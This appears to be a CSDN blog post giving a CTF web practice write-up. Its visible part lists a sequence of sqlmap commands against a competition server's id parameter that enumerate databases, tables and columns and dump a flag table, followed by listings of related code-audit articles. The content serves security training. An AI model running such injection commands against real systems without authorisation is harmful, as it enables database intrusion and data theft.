ctf-web之练习赛

最新推荐文章于 2024-07-29 00:39:13 发布
最新推荐文章于 2024-07-29 00:39:13 发布
阅读量188 收藏
点赞数
分类专栏: 自己的菜地
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zb0567/article/details/108111367
版权
本文详细介绍了CTF比赛中的Web安全挑战,包括SQL注入攻击的实战运用,如使用SQLmap工具探测数据库信息,获取flag。通过手工注入和代码审计,解决不同场景下的安全问题。此外,还涉及了session反序列化和SSRF等知识点。
摘要由CSDN通过智能技术生成

1\01-web_sqli_1

简单注入,SQLmap

/?id=4

python2 sqlmap.py -u http://42.236.2.183:10004/?id=3

python2 sqlmap.py -u http://42.236.2.183:10004/?id=3 --dbs

python2 sqlmap.py -u http://42.236.2.183:10004/?id=3 --tables

python2 sqlmap.py -u http://42.236.2.183:10004/?id=3 -T flagvalue --columns 报错 不需考虑

python2 sqlmap.py -u http://42.236.2.183:10004/?id=3 -D flagvalue -T flagvalue --columns 没考虑,欠妥

python2 sqlmap.py -u http://42.236.2.183:10004/?id=3 -T flag --columns

python2 sqlmap.py -u http://42.236.2.183:10004/?id=3 -D flag -T flag --columns

python2 sqlmap.py -u http://42.236.2.183:10004/?id=3 -T flag -columns --dump

python2 sqlmap.py -u http://42.236.2.183:10004/?id=3 -T flag -C txt --dump

flag in flagvalue da

最低0.47元/天 解锁文章
zb0567
关注
专栏目录
Web方向】 PHP代码审计 CTF题目wp1
wanderer的博客
11-14 1885
好难的题!
Ctfshow web入门 代码审计篇 web301-web310 详细题解 全
Jay17的博客
09-21 2046
Ctfshow web入门 代码审计篇 web301-web310 详细题解 全
CTF-代码审计-PHP
m0_74317362的博客
09-25 372
将代码复制到everedit中,可以看到乱码。要传参的变量名及其值都变了。
PolarCTF WEB题目 代码审计1WP
weixin_62257805的博客
10-13 333
PolarCTF WEB题目 代码审计1WP
CTFshow--Web--代码审计
最新发布
pwfortune的博客
07-29 1197
service/service.php , 也存在 clearCache()的调用, 而且在logout.php里面require了service.php,查询不到内容, 会在数据库中创建一个数据 123 , 那么这个123就会作为一个返回的数据, 用以跟用户输入的密码进行比较 , 相匹配的话就行登录进去了。在index.php下面 ,能够调用 checkVersion()函数 , 虽然header 头跳转了,但是还是会执行后面的代码。向服务端发送请求时,服务端会等待我们发送数据,处于wait状态。
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
CTF-WEB入门DOC-2019版1
08-03
CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
CTF-入门练习题
10-30
这个“CTF-入门练习题”很可能包含了一系列这样的挑战,旨在帮助初学者提升在网络安全领域的技能。 【网络攻防】 网络攻防是CTF中的核心部分,涉及攻击者与防御者的对抗。攻击者可能试图寻找系统漏洞,进行SQL注入...
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
本篇内容主要针对CTF Web实战练习进行了总结,分为入门的第一部分和第二部分,涵盖了多个不同类型的题目,旨在帮助学习者提升Web安全攻防能力。 **入门第一部分** 1. **bugku-ctf 第一题:成绩单** 这个题目可能...
CTF Web解题大解密:如何找到神秘的Flag,成为夺旗赛的MVP
12-29
为了在CTF Web解题中脱颖而出,成为夺旗赛的MVP,以下是一些关键的技巧和策略。 1. **全面分析目标网站**:首先,你需要深入理解你要攻击的目标,这包括浏览网站的所有页面,查看HTML源代码,分析JavaScript脚本,...
CTF之代码审计汇总
D-R0s1的博客
10-08 7197
  最近在做bugku中代码审计的题目,发现了web题目中存在着大量的php漏洞以及弱类型函数的绕过问题,现在借着bugku中的题目来统一的整理一下。希望通过整理可以温故而知新。 第一题:extract变量覆盖 焦点:extract($_GET) <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(fi...
ctfshow web入门 代码审计
Sentiment的博客
02-12 2942
web301
bugctf web代码审计 writeup
river
03-20 457
把题目做完了,记录一下题解 extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> ...
CTF web题日常积累——代码审计题型
zhy的博客
03-27 4582
1.变量1 题目来源: https://ctf.bugku.com/challenges 这是一个入门的代码审计题,难度不大,主要在于看代码逻辑和正则。 题目链接直接打开便是一段php源码,直接观察这个代码。明显可以看到一个正则表达式,这个正则表达式意为匹配都是字母的串。 而这里明显光是正则表达式是不够的,继续仔细看,在最后有一个$$...
CTFshow-WEB入门-代码审计
feng的博客
02-22 1751
前言 开始快乐的代码审计篇。 web301 源码下载下来分析一波,大部分都是无用的文件,主要还是在checklogin.php那里: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=$result->fetch_array(MYSQLI_BOTH); if($result->
ctf.show WEB入门-代码审计
~airrudder~
11-30 4447
ctfshow 代码审计篇 web301-web310
[CTFshow web入门]代码审计篇
Npceer-一位网安初学者的博客
08-09 519
前言 最近状态不太对 挺迷茫的 就先回来写点题练习练习 暑假也进入后半段了 摸鱼摸不动了 最近就学一下代码审计吧 找几个小CMS复现一下漏洞 然后在跟这Y4和feng师傅的博客复现一些框架好了 也稍微学一下工具的使用 sqlmap啊seay啊啥的 文章目录前言web301web302web302 web301 基础题 随便看一下 sql语句没有任何过滤 直接联合注入就行 $sql="select sds_password from sds_user where sds_username='".$usern
CTF-web 第三部分 代码审计
iamsongyu的博客
10-09 5898
http://www.mxcz.net/tools/rot13.aspx rot-13加密解密 http://www.zjslove.com/3.decode/ 凯撒 当铺 倒叙 维吉尼亚密码 实际上就是阅读有关的校验代码,人为构造特殊的输入或者参数才能拿到flag。需要了解一般的变量命名,判断语句和常用函数等,对于函数的执行流程还是很容易理解的,编程的关键点如下: 一些基本的语法含义 php编程...
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 773
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
网络安全新手CTF-Web靶场搭建实战演练指南
靶场提供的Web开发场景,是为了让新手了解和练习Web相关的安全攻防技术,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。 知识点八:文件名称"AJT-code" 文件名称"AJT-code"暗示这个压缩包可能包含了与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值